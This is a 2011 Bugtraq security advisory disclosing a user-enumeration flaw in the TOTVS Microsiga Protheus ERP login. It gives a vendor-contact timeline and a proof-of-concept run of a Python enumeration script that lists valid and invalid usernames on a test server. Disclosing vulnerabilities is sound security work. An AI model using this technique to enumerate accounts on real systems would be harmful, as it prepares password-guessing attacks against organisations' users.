[DCA-2011-0002]: TOTVS ERP Microsiga Protheus - Users Enumeration

From: Flavio do Carmo Junior aka waKKu <carmo.flavio@dclabs.com.br>
To: bugtraq@securityfocus.com
Cc:
Subject: [DCA-2011-0002]: TOTVS ERP Microsiga Protheus - Users Enumeration
Date:


[DCA-2011-0002]


[Discussion]
- DcLabs Security Research Group advises about following vulnerability(ies):

[Software]
- TOTVS ERP Microsiga Protheus

[Vendor Product Description - Portuguese]
- Software de Gesto - TOTVS
A TOTVS  uma empresa de software, inovao, relacionamento e suporte
 gesto, lder absoluta no Brasil, com 49,1% de share de mercado, e
tambm na Amrica Latina, com 31,2%*,  a maior empresa de softwares
aplicativos sediada em pases emergentes e a 7 maior do mundo no
setor.Tem mais de 25,2 mil clientes ativos, conta com o apoio de 9 mil
participantes e est presente em 23 pases.
Proposta de Valor
Tornar a empresa mais competitiva, com maior velocidade de deciso,
oferecendo solues que organizam, disciplinam, definem e impem
processos, armazenam dados, geram informao e auxiliam a gesto.
- Fonte: http://totvs.com.br/web/guest/software

[Advisory Timeline]
- 02/Feb/2011 -> Initial contact to vendor, security contact request.
- 03/Feb/2011 -> Security contact response.
- 03/Feb/2011 -> First notification sent, release date set to March 01, 2011.
- 04/Feb/2011 -> Vendor confirms notification received.
- 21/Feb/2011 -> Situation report requested.
- 01/Mar/2011 -> No vendor response.
- 02/Mar/2011 -> Advisory published.

[Bug Summary]
- Users enumeration

[Impact]
- Low

[Affected Version]
- Microsiga Protheus 8 (20081215030344)
- Microsiga Protheus 10 (20100812040605)
- Other versions can also be affected but weren't tested.

[Bug Description and Proof of Concept]
- The server validates the user before asking for a password, thus we
can keep trying usernames until we get a password prompt.

- A Proof of Concept has been created:

--- command line output begin ---
[waKKu@localhost: codes] # ./totvs_users_enumerator.py -h
usage: totvs_users_enumerator.py [options] [filename]
  -h for help

options:
 --version             show program's version number and exit
 -h, --help            show this help message and exit
 -i IPADDRESS, --ipaddress=IPADDRESS
                      Server IP address
 -p PORT, --port=PORT  Port number (defaults to 1234)
 -t TARGET, --target=TARGET
                      Target Version: 8 -> Protheus 8 | 10 -> Protheus 10.
                      Defaults to 10

[waKKu@localhost: codes] # ./totvs_users_enumerator.py --target 10
--ipaddress 192.168.4.95 userlist
Valid user: admin
Invalid user: fakeuser
Invalid user: nobody
Valid user: jonas
Valid user: fernando
Invalid user: elvis
--- command line output end ---

----------------------------------------------------------------------------------------

All flaws described here were discovered and researched by:
Flvio do Carmo Jnior aka waKKu.
DcLabs Security Research Group
carmo.flavio <AT> dclabs <DOT> com <DOT> br

[Workarounds]
- An initial workaround was provided to block user after 3 failed
password attempts, but it doesn't work against this kind of users
enumeration.

[Credits]
DcLabs Security Research Group.

-- 
--
Atenciosamente,

Flvio do Carmo Jnior aka waKKu @ DcLabs
Florianpolis/SC
http://br.linkedin.com/in/carmoflavio
http://0xcd80.wordpress.com





Copyright © 1995-2020 LinuxRocket.net. All rights reserved.